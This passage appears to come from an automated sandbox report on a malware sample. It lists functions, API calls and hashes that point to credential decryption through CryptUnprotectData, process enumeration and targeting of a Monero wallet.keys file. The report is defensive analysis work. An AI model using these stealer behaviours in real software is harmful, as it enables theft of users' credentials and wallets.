                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 4acc1d2df7cd87044bf7ac43df961875be12abe868bd1c05589977c81c49554b
                                  • Instruction ID: 66b9bafb98e0ae200fe29e197b7acd89912a428055595701a450df4f68b8652d
                                  • Opcode Fuzzy Hash: 4acc1d2df7cd87044bf7ac43df961875be12abe868bd1c05589977c81c49554b
                                  • Instruction Fuzzy Hash: 100140B5B44208FBDB20DFD4DD46F9E7778AB44700F104145FB45BB2C4C6B5AA008BA4
                                  Function 00E59600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E5961E
                                  • Process32First.KERNEL32(00E60ACA,00000128), ref: 00E59632
                                  • Process32Next.KERNEL32(00E60ACA,00000128), ref: 00E59647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00E5965C
                                  • CloseHandle.KERNEL32(00E60ACA), ref: 00E5967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: ba30e878712840dcb806fc93c6f168384dc7843901eafd4f06f4cda272bb28bb
                                  • Instruction ID: 8752b7217c5b6452f45ecfc2edf30d7dc06fdc15e5cce0dfbdc64fa9ee4caa48
                                  • Opcode Fuzzy Hash: ba30e878712840dcb806fc93c6f168384dc7843901eafd4f06f4cda272bb28bb
                                  • Instruction Fuzzy Hash: 92017175A10208EBCB20DFA4C848BEDBBF8FF08301F104589A946A7240D7799B48DF50
                                  Function 0120EA76 Relevance: 7.0, Strings: 5, Instructions: 752COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !~}~$.{K$i7$ti?w$v]m
                                  • API String ID: 0-2759975825
                                  • Opcode ID: 61b607db957c19a0acfc60b4a4f12f5db2834b4f0cf754d375b2ade28b55d585
                                  • Instruction ID: 9b6ef43cd8ffe009dd006265b2fd6903724df1383b89850874da8fe1b6274a5e
                                  • Opcode Fuzzy Hash: 61b607db957c19a0acfc60b4a4f12f5db2834b4f0cf754d375b2ade28b55d585
                                  • Instruction Fuzzy Hash: 9C3259F360C204AFE308AE2DEC9577ABBE5EB94320F15863DEAC4C7744E93558018796
                                  Function 00E58680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E605B7), ref: 00E586CA
                                  • Process32First.KERNEL32(?,00000128), ref: 00E586DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 00E586F3
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • CloseHandle.KERNEL32(?), ref: 00E58761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: e31a5b3060ba4856ed12f999ae7b4ea3043793bcfb8cf1042eb5fb8b39a9648b
                                  • Instruction ID: 119dbc5f5bbf38287f0761062e2ad06329fb3b635ff409236bb3a9edaee48f15
                                  • Opcode Fuzzy Hash: e31a5b3060ba4856ed12f999ae7b4ea3043793bcfb8cf1042eb5fb8b39a9648b
                                  • Instruction Fuzzy Hash: 00314F71901218EBCB24DF54DC45FEEB7B8FB49701F1056AAF90AB2190DB346A49CFA1
                                  Function 00E58EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00E45184,40000001,00000000,00000000,?,00E45184), ref: 00E58EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: a41c019ca999140bc1061efe67c5c22e2f32e4627de679263f52b89180ba0dd3
                                  • Instruction ID: b0dcfa6239174fe6bf1c7bf5d66e252823fa6b9635bcde0ae57603dcb72d04c3
                                  • Opcode Fuzzy Hash: a41c019ca999140bc1061efe67c5c22e2f32e4627de679263f52b89180ba0dd3
                                  • Instruction Fuzzy Hash: 01110A70304208EFDB04CF64DD85FAA33A9AF89319F10A848FD59AB244DB35EC45DB60
                                  Function 00E57980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E00,00000000,?), ref: 00E579B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E579B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00E60E00,00000000,?), ref: 00E579C4
                                  • wsprintfA.USER32 ref: 00E579F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: f4aa8f7a1e1587b32247805f8b7200a3e6d941e43cc4f9e5bc5a34858c8547da
                                  • Instruction ID: 08d80b00bf361ce62bb3857a22bea02790d3f26882cff40736bd53eb742d2712
                                  • Opcode Fuzzy Hash: f4aa8f7a1e1587b32247805f8b7200a3e6d941e43cc4f9e5bc5a34858c8547da
                                  • Instruction Fuzzy Hash: D51118B2A08118EACB249FC9D945BBEB7F8EB4CB11F10451AF685A2684D63D5940C7B0
                                  Function 00E57A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01CBE9A8,00000000,?,00E60E10,00000000,?,00000000,00000000), ref: 00E57A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01CBE9A8,00000000,?,00E60E10,00000000,?,00000000,00000000,?), ref: 00E57A7D
                                  • wsprintfA.USER32 ref: 00E57AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 6b624108493799ff4640eb52357740273fc9c501ed0c3c0ef197544b646349ca
                                  • Instruction ID: e84c9acffb60fee05c6fe77d846fd87763984288645bc16377506a2bcb220ee4
                                  • Opcode Fuzzy Hash: 6b624108493799ff4640eb52357740273fc9c501ed0c3c0ef197544b646349ca
                                  • Instruction Fuzzy Hash: C91182B1A49218DBDB208B54DC45F99B778F704721F104796E946A32C0C7781E54CF50
                                  Function 00E53720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00E5E118,00000000,00000001,00E5E108,00000000), ref: 00E53758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E537B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 520f6caf141561544f4959666ee4a648e86328c67fa98e565bc1e0d83bb27328
                                  • Instruction ID: 6c44a3053d0aec1690c8bbd651907636af1c449d092499ce796eff30b98dd4e9
                                  • Opcode Fuzzy Hash: 520f6caf141561544f4959666ee4a648e86328c67fa98e565bc1e0d83bb27328
                                  • Instruction Fuzzy Hash: 4F410771A00A289FDB28DB58CC94B9BB7B5BB48702F4055D8E609E72D0E771AE85CF50
                                  Function 00E49B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49BA3
                                  • LocalFree.KERNEL32(?), ref: 00E49BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: ab39f4229d97cd29e7f602d87fc5b8271d5e60d862f1406477809bfc249e90b6
                                  • Instruction ID: 1fdd0b5ec9eeb576e2c16659bbcc3cfe2fe2ce72bccdc4258add465e97f564fa
                                  • Opcode Fuzzy Hash: ab39f4229d97cd29e7f602d87fc5b8271d5e60d862f1406477809bfc249e90b6
                                  • Instruction Fuzzy Hash: C21109B8A00209EFCB04DF94D985AAEB7B5FF88300F104599E855A7344D775AE10CFA1
                                  Function 01211502 Relevance: 4.1, Strings: 2, Instructions: 1615COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~2^$|7J
                                  • API String ID: 0-2527045163
                                  • Opcode ID: 81ef113b4892cdd65318fa46419245b08200377ffef2f35962dce3349a0f0883
                                  • Instruction ID: e9eecc182e3db7ad8a5606063da7a0dba3e6166ad7caa20f4c35859502ac37ec
                                  • Opcode Fuzzy Hash: 81ef113b4892cdd65318fa46419245b08200377ffef2f35962dce3349a0f0883
                                  • Instruction Fuzzy Hash: D3B203F390C2149FE304AE29EC8567ABBE9EF94720F16493DEAC4C3744EA3558418793
                                  Function 0120FB28 Relevance: 4.1, Strings: 2, Instructions: 1561COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6_s$+xl
                                  • API String ID: 0-3448275489
                                  • Opcode ID: 5b93619212720a487a564321c058c25581d31f8b90c42024c06a5d8d7bdde061
                                  • Instruction ID: 0c5542bb15cedd0d353b6629710a7e24d17683b8867869aa4eead3f53814d031
                                  • Opcode Fuzzy Hash: 5b93619212720a487a564321c058c25581d31f8b90c42024c06a5d8d7bdde061
                                  • Instruction Fuzzy Hash: 0EB2F8F3A082049FE304AE2DEC8567AFBE5EF94720F1A453DEAC4C3744E63558158697
                                  Function 00E4F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
